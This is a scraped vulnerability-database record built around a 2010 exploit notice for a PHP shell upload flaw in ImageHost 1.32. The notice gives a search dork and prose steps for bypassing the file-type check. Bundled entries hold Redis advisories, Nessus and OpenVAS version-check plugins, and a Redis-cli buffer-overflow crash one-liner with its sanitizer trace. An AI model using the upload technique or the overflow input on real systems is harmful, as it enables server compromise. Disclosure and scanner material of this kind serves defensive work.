ID 1337DAY-ID-12326 Type zdt Reporter RiskY Modified 2010-05-21T00:00:00
Description
Exploit for php platform in category web applications
=========================================
ImageHost 1.32 Shell Upload Vulnerability
=========================================
# Exploit Title: [ImageHost 1.32 Shell Upload ]
# Category: [ php script upload ]
# Date: [2010-05-20]
# Author: [R i sk Y]
# Contact: [email protected] , [email protected] (hotmail)
# Software Link: [not available]
# Version: [1.32]
# Tested on: [Windows XP SP 3 ]
# Dork: " ImageHost 1.32 (c) 2006 by Gentoo Tpax"
# Info: The exploiter Uploads a Php shell using the Data Temper Addon ( In FireFox ) to change the
application/octet-stream to >> image/gif ... and click submit , and ur shell will b e uploaded sucessfully.
and the script will give u the direct link to ur php file.
GreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com
# 0day.today [2018-02-17] #
{"published": "2010-05-21T00:00:00", "id": "1337DAY-ID-12326", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T03:43:41", "bulletin": {"published": "2010-05-21T00:00:00", "id": "1337DAY-ID-12326", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-19T03:43:41"}}, "hash": "3741ec436852f0c9d677d15bf540f157fd4da3ee531732138f0061b768632ff8", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T03:43:41", "edition": 1, "title": "ImageHost 1.32 Shell Upload Vulnerability", "href": "http://0day.today/exploit/description/12326", "modified": "2010-05-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/12326", "references": [], "reporter": "RiskY", "sourceData": "=========================================\r\nImageHost 1.32 Shell Upload Vulnerability\r\n=========================================\r\n\r\n\r\n# Exploit Title: [ImageHost 1.32 Shell Upload ]\r\n\r\n# Category: [ php script upload ]\r\n\r\n# Date: [2010-05-20]\r\n\r\n# Author: [R i sk Y]\r\n\r\n# Contact: Risky.Hack@yahOO.com , rsk@null.net (hotmail)\r\n\r\n# Software Link: [not available]\r\n\r\n# Version: [1.32]\r\n\r\n# Tested on: [Windows XP SP 3 ]\r\n\r\n# Dork: \" ImageHost 1.32 (c) 2006 by Gentoo Tpax\"\r\n\r\n# Info: The exploiter Uploads a Php shell using the Data Temper Addon ( In FireFox ) to change the\r\napplication/octet-stream to >> image/gif ... and click submit , and ur shell will b e uploaded sucessfully.\r\nand the script will give u the direct link to ur php file.\r\n\r\n \r\n\r\nGreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com \r\n\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b0c5e16e327ebbf753eb1c8722e955c5", "key": "reporter"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "modified"}, {"hash": "8ebb2551672b288c4630fffaefe06aaa", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "daacce0a0e72db98280b4b986e01093b", "key": "sourceData"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "7050d548438c25db0fd4ff0591e39928", "key": "href"}, {"hash": "26e0a15a2c830557be4dbbfbb29e2339", "key": "sourceHref"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "e76d1f04044614888edfbd37e02ae5482227d91d779388318ce0d0fa9de4e906", "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2018-02-18T01:30:45"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:0094", "RHSA-2019:0052"]}, {"type": "nessus", "idList": ["REDIS_4_0_10.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891396", "OPENVAS:1361412562310813439", "OPENVAS:1361412562310105952"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1396-1:3B04A"]}, {"type": "zdt", "idList": ["1337DAY-ID-30598"]}, {"type": "exploitdb", "idList": ["EDB-ID:44904"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148225"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6028", "SECURITYVULNS:DOC:12326"]}], "modified": "2018-02-18T01:30:45"}, "vulnersScore": 1.7}, "type": "zdt", "lastseen": "2018-02-18T01:30:45", "edition": 2, "title": "ImageHost 1.32 Shell Upload Vulnerability", "href": "https://0day.today/exploit/description/12326", "modified": "2010-05-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/12326", "references": [], "reporter": "RiskY", "sourceData": "=========================================\r\nImageHost 1.32 Shell Upload Vulnerability\r\n=========================================\r\n\r\n\r\n# Exploit Title: [ImageHost 1.32 Shell Upload ]\r\n\r\n# Category: [ php script upload ]\r\n\r\n# Date: [2010-05-20]\r\n\r\n# Author: [R i sk Y]\r\n\r\n# Contact: [email\u00a0protected] , [email\u00a0protected] (hotmail)\r\n\r\n# Software Link: [not available]\r\n\r\n# Version: [1.32]\r\n\r\n# Tested on: [Windows XP SP 3 ]\r\n\r\n# Dork: \" ImageHost 1.32 (c) 2006 by Gentoo Tpax\"\r\n\r\n# Info: The exploiter Uploads a Php shell using the Data Temper Addon ( In FireFox ) to change the\r\napplication/octet-stream to >> image/gif ... and click submit , and ur shell will b e uploaded sucessfully.\r\nand the script will give u the direct link to ur php file.\r\n\r\n \r\n\r\nGreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com \r\n\r\n\r\n\n\n# 0day.today [2018-02-17] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b03a6276691182d3b43871602a899729", "key": "href"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "modified"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b0c5e16e327ebbf753eb1c8722e955c5", "key": "reporter"}, {"hash": "9d8b01653fc183fed6d3eda650c8958a", "key": "sourceData"}, {"hash": "7a84200b1f5b49fda14a7a5c9201d977", "key": "sourceHref"}, {"hash": "8ebb2551672b288c4630fffaefe06aaa", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"redhat": [{"lastseen": "2019-08-13T18:45:43", "bulletinFamily": "unix", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap buffer overflow in HyperLogLog triggered by malicious client (CVE-2019-10192)\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: Code execution in redis-cli via crafted command line arguments (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-25T20:02:37", "published": "2019-07-25T19:55:00", "id": "RHSA-2019:1860", "href": "https://access.redhat.com/errata/RHSA-2019:1860", "type": "redhat", "title": "(RHSA-2019:1860) Important: rh-redis32-redis security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:27", "bulletinFamily": "unix", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: code execution via a crafted command line (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-01-16T22:35:11", "published": "2019-01-16T22:06:31", "id": "RHSA-2019:0094", "href": "https://access.redhat.com/errata/RHSA-2019:0094", "type": "redhat", "title": "(RHSA-2019:0094) Moderate: redis security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:27", "bulletinFamily": "unix", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: code execution via a crafted command line (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-01-16T21:52:35", "published": "2019-01-16T21:51:00", "id": "RHSA-2019:0052", "href": "https://access.redhat.com/errata/RHSA-2019:0052", "type": "redhat", "title": "(RHSA-2019:0052) Moderate: redis security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-03T12:12:35", "bulletinFamily": "scanner", "description": "The version of Redis installed on the remote host is affected by\nmultiple vulnerabilities and therefore requires a security update.", "modified": "2019-11-02T00:00:00", "id": "REDIS_4_0_10.NASL", "href": "https://www.tenable.com/plugins/nessus/117484", "published": "2018-09-14T00:00:00", "title": "Pivotal Software Redis LUA < 3.2.12 / 4.0.x < 4.0.10 / 5.0 < 5.0rc2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117484);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-12326\");\n\n script_name(english:\"Pivotal Software Redis LUA < 3.2.12 / 4.0.x < 4.0.10 / 5.0 < 5.0rc2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Pivotal Software Redis.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Redis requires a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Redis installed on the remote host is affected by\nmultiple vulnerabilities and therefore requires a security update.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://antirez.com/news/119\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Redis 3.2.12, 4.0.10 or 5.0-rc2 or higher.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11218\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:redis\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"redis_detect.nbin\");\n script_require_ports(\"Services/redis_server\", 6379);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\n\nappname = \"Redis Server\";\nport = get_service(svc:\"redis_server\", default:6379, exit_on_fail:TRUE);\nversion = get_kb_item_or_exit(\"redis/\" + port + \"/Version\");\n\nfix = NULL;\nif (version =~ \"^[1-3]\\.\") fix = \"3.2.12\";\nelse if (version =~ \"^4\\.0\") fix = \"4.0.10\";\nelse if (version =~ \"^4\\.9\") fix = \"4.9.102\";\n\nif (!isnull(fix) && ver_compare(ver:version, fix:fix) == -1)\n{\n report =\n '\\n Port : ' + port +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "scanner", "description": "It was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\ncorruption and integer overflow vulnerabilities. (#901495)\n\n * CVE-2018-12326: Buffer overflow in the ", "modified": "2019-03-18T00:00:00", "published": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310891396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891396", "title": "Debian LTS Advisory ([SECURITY] [DLA 1396-1] redis security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1396.nasl 14270 2019-03-18 14:24:29Z cfischer $\n#\n# Auto-generated from advisory DLA 1396-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891396\");\n script_version(\"$Revision: 14270 $\");\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-11219\", \"CVE-2018-12326\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1396-1] redis security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:24:29 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-10 00:00:00 +0200 (Tue, 10 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00003.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"redis on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these issues have been fixed in redis version\n2:2.8.17-1+deb8u6.\n\nWe recommend that you upgrade your redis packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\ncorruption and integer overflow vulnerabilities. (#901495)\n\n * CVE-2018-12326: Buffer overflow in the 'redis-cli' tool which could\nhave allowed an attacker to achieve code execution and/or escalate to\nhigher privileges via a crafted command line. (#902410)\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"redis-server\", ver:\"2:2.8.17-1+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"redis-tools\", ver:\"2:2.8.17-1+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "description": "This host is running Redis and is prone to\n buffer overflow vulnerability.", "modified": "2019-05-17T00:00:00", "published": "2018-06-18T00:00:00", "id": "OPENVAS:1361412562310813439", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813439", "title": "Redis Buffer Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Redis Buffer Overflow Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:redis:redis\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813439\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-12326\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-18 16:33:41 +0530 (Mon, 18 Jun 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Redis Buffer Overflow Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Redis and is prone to\n buffer overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a buffer overflow\n error in redis-cli of Redis.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to achieve code execution and escalate to higher privileges via a crafted\n command line.\");\n\n script_tag(name:\"affected\", value:\"Redis versions before 4.0.10 and 5.x before\n 5.0 RC3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Redis version 4.0.10 or 5.0 RC3\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://gist.github.com/fakhrizulkifli/f831f40ec6cde4f744c552503d8698f0\");\n script_xref(name:\"URL\", value:\"https://github.com/antirez/redis/commit/9fdcc15962f9ff4baebe6fdd947816f43f730d50\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/4.0/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/antirez/redis/5.0/00-RELEASENOTES\");\n script_xref(name:\"URL\", value:\"https://redis.io\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"gb_redis_detect.nasl\");\n script_require_ports(\"Services/redis\", 6379);\n script_mandatory_keys(\"redis/installed\");\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE)) exit(0);\nversion = infos['version'];\n\nif(version_is_less(version:version, test_version: \"4.0.10\")){\n fix = \"4.0.10\";\n}\n\n##5.0 RC1 == 4.9.101, 5.0 RC2 == 4.9.102\nelse if((version == \"4.9.101\") || (version == \"4.9.102\")){\n fix = \"5.0 RC3\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:version, fixed_version: fix);\n security_message(port: port, data: report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "description": "Gogs (Go Git Service) is prone to multiple vulnerabilities.", "modified": "2018-11-13T00:00:00", "published": "2015-02-06T00:00:00", "id": "OPENVAS:1361412562310105952", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105952", "title": "Gogs Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_gogs_multiple_vuln.nasl 12326 2018-11-13 05:25:34Z ckuersteiner $\n#\n# Gogs Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:gogs:gogs';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105952\");\n script_version(\"$Revision: 12326 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-13 06:25:34 +0100 (Tue, 13 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-06 14:11:04 +0700 (Fri, 06 Feb 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2014-8681\", \"CVE-2014-8682\", \"CVE-2014-8683\");\n script_bugtraq_id(71188, 71187, 71186);\n\n script_name(\"Gogs Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n\n script_dependencies(\"gb_gogs_detect.nasl\");\n script_mandatory_keys(\"gogs/detected\");\n\n script_tag(name:\"summary\", value:\"Gogs (Go Git Service) is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The installed Gogs version is prone to the following vulnerabilities:\n\n CVE-2014-8681:\n SQL injection vulnerability in the GetIssues function in models/issue.go.\n\n CVE-2014-8682:\n Multiple SQL injection vulnerabilities in the q parameter of api/v1/repos/search, which is not properly handled in models/repo.go and in api/v1/users/search, which is not properly handled in models/user.go.\n\n CVE-2014-8683:\n Cross-site scripting (XSS) vulnerability in models/issue.go.\");\n\n script_tag(name:\"impact\", value:\"Unauthenicated attackers can exploit this vulnerabilities to perform\n an XSS attack or execute arbitrary SQL commands which may lead to a complete compromise of the database.\");\n\n script_tag(name:\"affected\", value:\"Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.8\");\n\n script_tag(name:\"solution\", value:\"Update to version 0.5.8 or later.\");\n\n script_xref(name:\"URL\", value:\"http://gogs.io/docs/intro/change_log.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/129116/Gogs-Label-Search-Blind-SQL-Injection.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/129118/Gogs-Markdown-Renderer-Cross-Site-Scripting.html\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"0.5.8\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"0.5.8\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-09-27T10:36:14", "bulletinFamily": "unix", "description": "Package : redis\nVersion : 2:2.8.17-1+deb8u6\nCVE IDs : CVE-2018-11218, CVE-2018-11219, CVE-2018-12326\nDebian Bugs : #901495, #902410\n\nIt was discovered that there were a number of vulnerabilities in redis,\na persistent key-value database:\n\n * CVE-2018-11218, CVE-2018-11219: Multiple heap\n corruption and integer overflow vulnerabilities. (#901495)\n\n * CVE-2018-12326: Buffer overflow in the "redis-cli" tool which could\n have allowed an attacker to achieve code execution and/or escalate to\n higher privileges via a crafted command line. (#902410)\n\nFor Debian 8 "Jessie", these issues have been fixed in redis version\n2:2.8.17-1+deb8u6.\n\nWe recommend that you upgrade your redis packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. `'` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "modified": "2018-06-26T16:07:53", "published": "2018-06-26T16:07:53", "id": "DEBIAN:DLA-1396-1:3B04A", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201806/msg00003.html", "title": "[SECURITY] [DLA DLA-1396-1] redis security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-06-19T11:38:10", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2018-06-19T00:00:00", "published": "2018-06-19T00:00:00", "id": "1337DAY-ID-30598", "href": "https://0day.today/exploit/description/30598", "title": "Redis-cli < 5.0 - Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)\r\n# Exploit Author: Fakhri Zulkifli\r\n# Vendor Homepage: https://redis.io/\r\n# Software Link: https://redis.io/download\r\n# Version: 5.0, 4.0, 3.2\r\n# Fixed on: 5.0, 4.0, 3.2\r\n# CVE : CVE-2018-12326\r\n \r\n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker\r\n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.\r\n \r\n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'`\r\nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known\r\n \r\n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566\r\n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637\r\n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5\r\n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9\r\n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291\r\n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)\n\n# 0day.today 